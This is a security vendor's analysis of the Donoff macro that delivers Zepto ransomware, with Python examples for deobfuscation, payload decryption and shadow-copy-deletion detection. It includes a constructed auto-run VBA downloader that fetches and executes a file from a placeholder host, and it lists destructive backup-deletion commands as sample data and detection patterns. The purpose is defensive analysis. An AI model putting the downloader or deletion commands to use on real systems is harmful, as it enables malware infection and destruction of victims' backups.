Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). The attachment is a macro-enabled Word document, detected as Donoff, whose macro downloads the Zepto executable; Zepto then encrypts the user's files and demands payment for the decryption key.
We decided to take a closer look at the Donoff macro used to download the Zepto ransomware. Here is what we found:
The VBA Macro code
At first glance, the code is fully commented in Spanish and uses randomly generated variable names.
Here is a look at the code:
The Word document contains two macro functions, autoopen and ActualizarEntrada (Spanish for "update entry"). Word runs an AutoOpen macro automatically as soon as the document is opened with macros enabled, so this is the entry point of the infection chain.
Here are more snips of code showing the processing of obfuscated text.
These are the strings revealed after deobfuscation.
The deobfuscated code uses the Microsoft.XMLHTTP and ADODB.Stream COM objects to download Zepto.
Microsoft.XMLHTTP is the MSXML component that gives script code client-side HTTP access to documents on remote servers (the same API browsers expose as XMLHttpRequest). Despite the name it is not limited to XML: it will request or send any kind of content, which is why macro downloaders use it to fetch executables.
ADODB.Stream is used to read, write and manage a stream of binary data or text. A downloader typically writes the HTTP response body into a binary-mode stream and then saves it to disk with the stream's SaveToFile method, which is how the payload reaches the file system without any dedicated file-writing API.
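As an added example (this is not code from the original post or from ThreatTrack), here is a small Python triage script for this kind of macro. It folds the Chr()-and-concatenation string obfuscation the post describes back into literal strings and then flags the four building blocks of the downloader: an auto-executing entry point, the XMLHTTP client, the ADODB.Stream writer and a Shell call. The macro text it runs on is a constructed stand-in that mimics the pattern, not the actual Donoff sample; the URL in it (example.invalid) is hypothetical.

```python
import json
import re

# Indicator patterns for the downloader pattern described in the post: an
# auto-executing macro, an HTTP client object, a binary stream for writing the
# payload to disk, and an execution primitive.
INDICATORS = {
    "autoexec":      re.compile(r"\b(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec)\b", re.I),
    "http_download": re.compile(r"Microsoft\.XMLHTTP|MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "file_write":    re.compile(r"ADODB\.Stream|Scripting\.FileSystemObject", re.I),
    "execution":     re.compile(r"\bShell\b|WScript\.Shell|ShellExecute", re.I),
}

CHR_CALL = re.compile(r"\bChr[WB]?\(\s*(\d+)\s*\)", re.I)    # Chr(77), ChrW(77), ChrB(77)
STR_CONCAT = re.compile(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"')    # "ab" & "cd"


def deobfuscate(vba: str) -> str:
    """Fold Chr() calls and adjacent string concatenations into literal strings.

    Chr(34) (the double quote) and control characters are left unfolded:
    folding them would unbalance the quoting the concatenation step relies on.
    """
    def fold_chr(m):
        code = int(m.group(1))
        if code == 34 or code < 32 or code > 126:
            return m.group(0)
        return '"' + chr(code) + '"'

    text = CHR_CALL.sub(fold_chr, vba)
    while True:  # repeat until no "a" & "b" pairs remain
        folded = STR_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if folded == text:
            return text
        text = folded


def triage(vba: str, deobfuscate_first: bool = True) -> dict:
    """Return {indicator_name: [matching source lines]} for the macro text."""
    text = deobfuscate(vba) if deobfuscate_first else vba
    hits = {}
    for name, pattern in INDICATORS.items():
        lines = [ln.strip() for ln in text.splitlines() if pattern.search(ln)]
        if lines:
            hits[name] = lines
    return hits


# Constructed stand-in for the Donoff macro: Spanish comments, random-looking
# names, object names split with Chr() and "&". Not the real sample.
SAMPLE_MACRO = r'''
Sub autoopen()
    ' Descarga el archivo y lo ejecuta
    Dim qzXv As Object
    Set qzXv = CreateObject("Micro" & "soft." & "XMLH" & Chr(84) & Chr(84) & "P")
    qzXv.Open "GET", "http://example.invalid/f.bin", False
    qzXv.send
    Dim sTm As Object
    Set sTm = CreateObject("ADO" & "DB.Str" & "eam")
    sTm.Type = 1
    sTm.Open
    sTm.Write qzXv.responseBody
    sTm.SaveToFile Environ("TEMP") & "\sysdrubpas.exe", 2
    Shell Environ("TEMP") & "\sysdrubpas.exe", 0
End Sub
'''

if __name__ == "__main__":
    print("raw scan:      ", json.dumps(triage(SAMPLE_MACRO, deobfuscate_first=False), indent=2))
    print("after folding: ", json.dumps(triage(SAMPLE_MACRO), indent=2))
```

The raw scan misses the HTTP and stream objects entirely because their names never appear contiguously in the source; only after the string folding do all four indicators light up. That is the practical lesson from this sample: string-match rules on obfuscated VBA need a deobfuscation pass in front of them.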
The following code decrypts to
Here is the code that downloads the encrypted Zepto executable:
The downloaded file is encrypted and is stored on the file system as TempWFDSAdrweg. The macro then uses the key Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym to decrypt it and writes the decrypted binary to sysdrubpas.exe in the %temp% folder, which is usually C:\Users\<username>\AppData\Local\Temp. Encrypting the payload in transit is a common trick: the bytes on the wire do not look like an executable, so network-level inspection that keys on PE headers never sees one.
Encrypted Zepto (Displayed here in Hexadecimals):
Decrypted Zepto (now in Executable form):
The script then executes sysdrubpas.exe, infecting the user's system.
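The post gives the key but not the cipher, so the following added example (not code from the post or from ThreatTrack) shows what an analyst would do with the on-disk blob and the key: try the simple repeating-key transforms these macro downloaders usually use (XOR, byte add, byte subtract; this is an assumption, not the verified Donoff algorithm) and accept a candidate only if it parses as a PE image (MZ header with e_lfanew pointing at the PE signature). It also shows the known-plaintext trick: every PE starts with "MZ" and a DOS stub, so when the cipher is XOR, cipher XOR plaintext recovers key bytes directly. The payload it works on is a constructed minimal PE header, not the Zepto binary.

```python
import struct

# Key quoted in the post. The cipher is NOT stated there, so the transforms
# below are an analyst's candidates, not the macro's verified algorithm.
KEY = b"Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def sub_repeating(data: bytes, key: bytes) -> bytes:
    return bytes((b - key[i % len(key)]) & 0xFF for i, b in enumerate(data))


def add_repeating(data: bytes, key: bytes) -> bytes:
    return bytes((b + key[i % len(key)]) & 0xFF for i, b in enumerate(data))


# Candidate decryptions, tried in this order.
CANDIDATES = {"xor": xor_repeating, "sub": sub_repeating, "add": add_repeating}


def looks_like_pe(data: bytes) -> bool:
    """MZ at offset 0 and e_lfanew (offset 0x3C) pointing at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_payload(blob: bytes, key: bytes = KEY):
    """Try each candidate transform; return (name, plaintext) for the first valid PE."""
    for name, transform in CANDIDATES.items():
        candidate = transform(blob, key)
        if looks_like_pe(candidate):
            return name, candidate
    return None, b""


def xor_key_from_known_plaintext(blob: bytes, known_prefix: bytes = b"MZ") -> bytes:
    """For a XOR cipher, cipher[i] ^ plain[i] == key[i]; the PE header is known plaintext."""
    return bytes(c ^ p for c, p in zip(blob, known_prefix))


def build_fake_pe() -> bytes:
    """Constructed minimal PE header (not the Zepto binary) used for the demonstration."""
    header = bytearray(b"MZ" + b"\x00" * 0x3A)            # DOS header up to e_lfanew
    header += struct.pack("<I", 0x40)                     # e_lfanew -> 0x40
    header += b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 58  # PE signature, machine field, padding
    return bytes(header)


if __name__ == "__main__":
    plain = build_fake_pe()
    blob = xor_repeating(plain, KEY)  # simulate an on-disk blob like TempWFDSAdrweg
    name, recovered = recover_payload(blob)
    print("cipher:", name, "| valid PE recovered:", recovered == plain)
    print("key bytes from known plaintext:", xor_key_from_known_plaintext(blob, plain[:8]))
```

Validating on the PE structure rather than just the two "MZ" bytes matters: with three candidate transforms and a 32-byte key, a two-byte check would produce false positives on real-world blobs often enough to waste time.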
ThreatAnalyzer – Malware Sandbox Analysis
When the malicious Word document is executed in our malware analysis sandbox, ThreatAnalyzer, it produces the following process tree:
One notable behavior common to ransomware is the deletion of Volume Shadow Copies, which removes the snapshots Windows uses for Previous Versions and System Restore and so prevents easy restoration of the encrypted files from local backups.
Other behaviors closely match those described in our previous post about Zepto ransomware: https://blog.threattrack.com/ransomware-packed-into-wsf-spam/.
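Shadow copy deletion is one of the most reliable ransomware behaviors to alert on. The following added example (not part of the post or ThreatTrack's tooling) runs a small detection over constructed Sysmon-style process-creation records that mirror the chain above: Word spawning a dropped executable in %temp%, which in turn runs snapshot-deletion commands. The commands matched are the documented Windows built-ins for snapshot and recovery destruction; the post does not say which of them Zepto uses, and the log records are constructed, not the sandbox output.

```python
import re

# Command-line signatures for backup/snapshot destruction. These are the
# well-known Windows built-ins; the post does not name which one Zepto runs.
RULES = [
    ("vssadmin delete shadows",       re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("vssadmin resize shadowstorage", re.compile(r"\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b", re.I)),
    ("wmic shadowcopy delete",        re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("powershell shadow copy delete", re.compile(r"Win32_ShadowCopy\b.*\b(?:Delete|Remove-WmiObject|Remove-CimInstance)\b", re.I)),
    ("bcdedit disable recovery",      re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("wbadmin delete catalog",        re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+catalog\b", re.I)),
]

# Parents that have no business tearing down backups: anything running from a
# user-writable directory, or an Office application.
SUSPICIOUS_PARENT = re.compile(
    r"\\(?:Temp|Downloads|AppData)\\|\\(?:WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.I)


def detect(events):
    """Return one finding per event whose CommandLine matches a destruction rule."""
    findings = []
    for index, ev in enumerate(events):
        cmd = ev.get("CommandLine", "")
        for rule, pattern in RULES:
            if pattern.search(cmd):
                parent = ev.get("ParentImage", "")
                findings.append({
                    "index": index,
                    "rule": rule,
                    "severity": "high" if SUSPICIOUS_PARENT.search(parent) else "medium",
                    "parent": parent,
                    "command": cmd,
                })
                break  # one rule per event is enough
    return findings


# Constructed Sysmon-style process-creation records (Event ID 1 fields), not
# the ThreatAnalyzer process tree from the post.
DROPPED = r"C:\Users\u\AppData\Local\Temp\sysdrubpas.exe"
WORD = r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"Image": WORD, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\u\Downloads\invoice.doc"'},
    {"Image": DROPPED, "ParentImage": WORD, "CommandLine": DROPPED},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": DROPPED,
     "CommandLine": r"vssadmin.exe Delete Shadows /All /Quiet"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"vssadmin.exe list shadows"},  # benign: listing, not deleting
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": DROPPED,
     "CommandLine": r"wmic.exe shadowcopy delete"},
    {"Image": r"C:\Windows\System32\bcdedit.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bcdedit.exe /set {default} recoveryenabled No"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['rule']}: {finding['command']}  (parent: {finding['parent']})")
```

The parent-process context is what separates a noisy rule from a useful one: administrators do run vssadmin, but not from an executable dropped in %temp% by Word. Matching on the full command line rather than the image name also catches renamed copies of the tools, and the "list shadows" record shows why the verb has to be part of the pattern.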
Prevent Ransomware Infections?
To prevent ransomware, we recommend blocking it as early in its infection chain as possible. Here are some tips:
- Always keep your operating system, applications and security products patched and up to date
- Take precautions when opening attachments, especially those sent by an unknown sender
- Never enable VBA macros by default in any Microsoft Office application. Some macro malware even includes instructions on how to enable macros, or misleads you into doing so.
- Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
- Regularly back up your data, and keep copies offline or otherwise out of reach of the infected machine: ransomware that deletes shadow copies will also encrypt or delete any backup it can reach
Indicators of Compromise (MD5)
e98aee56175daaa96f259d04077d820f – malicious DOC attachment (Trojan-Downloader.O97M.Donoff.by (v))
837a5b0dbd5850634bfecadadc751cdd – Zepto executable (Trojan.Win32.Generic!BT)
Analysis by Wilmina Elizon
About the Author: ThreatTrack Security Labs
ThreatTrack Security Labs is the power behind the malware analysis, detection and remediation technologies developed by ThreatTrack Security. From facilities in the United States and the Philippines, our team of cybersecurity professionals, malware researchers, engineers and software developers work around the clock to discover and combat Advanced Persistent Threats, targeted attacks, Zero-days and other sophisticated malware. The company develops advanced cybersecurity solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more about ThreatTrack Security.